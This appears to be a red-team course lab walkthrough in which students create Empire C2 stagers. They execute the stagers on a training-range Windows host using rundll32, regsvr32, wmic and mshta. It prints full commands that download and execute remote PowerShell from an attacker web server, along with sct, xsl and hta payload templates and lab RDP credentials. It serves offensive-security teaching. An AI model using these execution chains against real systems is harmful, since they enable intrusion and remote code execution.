Lab 3.1 : Creating and Testing Payloads
Objectives
- Create different payloads for familiarity
- Test payloads from the range
- Use additional tools to enhance payloads
This lab will focus on creating multiple payloads and then testing them in the student range. We will use various methods to gain familiarity with different techniques. For the purpose of this lab we will use our RDP connection to the student Windows instance for ease of use.
TTPs Emulated in this Lab
- T1583 - Acquire Infrastructure
- T1218.005 - Signed Binary Proxy Execution: Mshta
- T1218.010 - Signed Binary Proxy Execution: Regsvr32
- T1218.011 - Signed Binary Proxy Execution: Rundll32
- T1047 - Windows Management Instrumentation
Preparation
Warning
Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.
Preparation Steps
Ensure you are connected to the VPN and can ping from the Slingshot Linux VM to the draconem.io website.
Open a terminal on Slingshot. Connect to the VPN with openvpn and take note of your ip address:
sudo openvpn ~/Desktop/sec565-labs-range.ovpn
Ctrl+Shift+t to open a new terminal tab, then run the following command to create four ICMP packets :
ping -c 4 draconem.io
If you get a successful ping, then curl the website. The ping tests icmp while the curl tests dns, tcp, and http.
curl draconem.io | head

On Your Own
- Create an Empire listener
- Create a PowerShell stager
- Execute the stager with rundll32.exe to create an agent in the target environment via RDP:
xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp - Repeat the process with an sct stager and execute with regsvr32.exe
- Repeat the process with a wmic stager and execute with wmic
- Repeat the process with an hta stager and execute with mshta.exe
- Review the walkthrough
Walkthrough
Launch Empire and Starkiller
Note
If your C2 is still active then delete your listeners, set up listener according to the Walkthrough step 1. Then skip down to step 5
1. Launch Empire and start an http listener on port 8080 for your tun0 interface. If you run into any issues refer back to Lab 2.1 - C2 Introduction with Empire
Create PowerShell Stager
2. Create an Empire stager. Click on the suitcase icon
on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.
Select multi/launcher in the drop down menu. Then provide the following values:
- StarkillerName:
interactive-http-pwsh - Listener:
interactive-http - Language:
powershell
Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.

On Slingshot, navigate to the Stagers dashboard, click the three vertical dots icon
under actions to bring up the actions menu. Click Copy to Clipboard.

3. Create a directory to store and serve your stagers.
mkdir -p /tmp/3-1/
cd /tmp/3-1/
vim setup.ps1
Press i to enter insert mode in vim, then Ctrl+Shift+v to paste the launcher code.
Press esc then type :wq to save the file.
4. Serve or host stagers by starting a python web server in your temporary directory.
cd /tmp/3-1/
python3 -m http.server 8000
Tip
Red Team Tip: Remember to always create a temporary directory to serve payloads or other files for transfer. Serving your home directory or another important directory means that you are serving those files to the world.
Execute Stager with rundll32.exe
5. Deliver your stager to the Windows system. Establish an RDP session to the wk01 Windows instance, using the credentials Gareth.Kilgallen : Hu825meapvsAq#Rx. We will use xfreerdp on our Slingshot Linux VM with the clipboard plugin so that we can paste our stager into a command prompt.
xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp
6. Open a command prompt by clicking the windows icon in the lower left and typing cmd.exe. Then enter the following to have rundll32.exe execute javascript that will then execute PowerShell of the launcher code. Press Enter to spawn a new agent. Run a few commands on the new agent to check the health of the agent. Do not exit your RDP session.
Warning
Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://10.254.252.3:8000/setup.ps1');")
In the above command we are using a signed Windows binary that is used to load dlls. We execute in-line javascript to run an HTML application using an Active X object. Then WScript will download our ps1 file and execute it.
Create SCT Stager
7. Create an Empire stager as a Windows Scripting Component file .sct. Click on the suitcase icon
on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.
Select windows/launcher_sct in the drop down menu. Then provide the following values:
- StarkillerName:
interactive-http-sct - Listener:
interactive-http - Language:
powershell - OutFile:
/tmp/3-1/config.sct
Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.

8. On the Stagers dashboard, click the three vertical dots icon
under actions to bring up the actions menu. Click Download and save the file to /tmp/3-1/config.sct.
Execute Stager with regsvr32.exe
9. Open a command prompt, then enter the following to have regsvr32.exe download the sct file from our webserver and execute the PowerShell contained within. Press Enter to spawn a new agent. Run a few commands on the new agent to check the health of the agent.
Warning
Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.
regsvr32 /s /n /u /i:http://10.254.252.3:8000/config.sct scrobj.dll
In the above command, /s will run silently without displaying any messages. /n states that the process should not call DLL Register Server. /u is set to use the unregister method.
Create WMIC Stager
10. Create a wmic Empire stager. Click on the suitcase icon
on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.
Select windows/wmic in the drop down menu. Then provide the following values:
- StarkillerName:
interactive-http-wmic - Listener:
interactive-http - Language:
powershell
Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.
11. On the Stagers dashboard, click the three vertical dots icon
under actions to bring up the actions menu. Click Download and save the file to /tmp/3-1/update.xsl (the default filename will be launcher.xsl).

Execute Stager with wmic
12. Open a PowerShell prompt, then enter the following to download the xsl file from our webserver and execute the PowerShell contained within. Press Enter to spawn a new agent. Run a few commands on the new agent to check the health of the agent.
Warning
Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.
wget http://10.254.252.2:8000/update.xsl -o update.xsl
wmic os get /format:"update.xsl"
Note, this leaves the xsl file behind on disk as an artifact. Keep that in mind during operations.
Previously, it was possible to perform this attack completely fileless using wmic os get /format:"http://10.254.252.2:8000/update.xsl" but this has been patched.
Create HTA Stager
13. Create an hta Empire stager. Click on the suitcase icon
on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.
Select windows/hta in the drop down menu. Then provide the following values:
- StarkillerName:
interactive-http-hta - Listener:
interactive-http - Language:
powershell
Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.
On the Stagers dashboard, click the three vertical dots icon
under actions to bring up the actions menu. Click Copy to Clipboard.

14. Save the contents in a file in the temporary directory.
cd /tmp/3-1/
vim app.hta
Press i to enter insert mode in vim, then Ctrl+Shift+v to paste the launcher code.
Press esc then type :wq to save the file.
Execute Stager with mshta.exe
15. Open a command prompt, then enter the following to have mshta.exe download and execute the hta file from our webserver and execute the PowerShell contained within. Press Enter to spawn a new agent. Run a few commands on the new agent to check the health of the agent.
Warning
Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.
mshta.exe http://10.254.252.3:8000/app.hta
Compare payloads
Spend a little time comparing the three wrappers for our PowerShell payload.
config.sct
<?XML version="1.0"?>
<scriptlet>
<registration
description="Win32COMDebug"
progid="Win32COMDebug"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run('powershell ... trimmed ...');
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
</scriptlet>
update.xsl
<?xml version="1.0"?><stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/><ms:script implements-prefix="user" language="JScript">
<![CDATA[var r = new ActiveXObject("WScript.Shell").Run("powershell ... trimmed ...");]]
app.hta
<html><head><script>var c= 'powershell... trimmed ...
new ActiveXObject('WScript.Shell').Run(c);</script></head>
<body><script>self.close();</script></body></ht
Conclusion
We used multiple stagers to deliver the first stage of our PowerShell agent. We took the time to execute the code using a few different techniques. The binaries we used are signed Microsoft binaries and most will always be on a Windows system. Some techniques will be highly signatured depending on the the maturity of the target network. It is important to experiment with different techniques and to test in a lab environment. Keep your Empire C2 up for the remainder of the section labs.